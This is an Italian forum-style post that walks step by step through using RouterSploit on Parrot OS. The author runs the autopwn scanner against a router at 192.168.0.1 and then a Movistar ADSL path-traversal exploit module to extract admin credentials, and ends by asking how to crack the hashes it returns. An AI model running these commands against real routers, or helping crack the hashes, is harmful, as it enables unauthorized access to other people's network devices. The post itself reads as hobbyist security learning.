È scritto in Python3, premetto che non si tratta di informatica oscura.
Ho installato su macchina virtuale "Parrot OS" una distribuzione Linux italiana basata su Debian.
1. Aprire il terminale e localizzare RouterSploit.
2. Eseguire RouterSploit con il comando python3 rsf.py
3. digitare il comando use scanners/autopwn
4. settare il target dell'indirizzo del router (nel mio caso 192.168.0.1)
5. settare la porta http su 80.
6. eseguire il comando run per far partire il processo.
7. Nel mio caso è stata trovata una vulnerabilità. È indicata nell'exploit.
8. digitare il comando
Codice: Seleziona tutto
use tuoexploit
Codice: Seleziona tutto
use exploits/routers/movistar/adsl_router_bhs_rta_path_traversal
A questo punto dovrebbero comparire a monitor le credenziali admin e password.
Nel mio caso però appaiono degli hash code...
...e non capisco come decifrarli..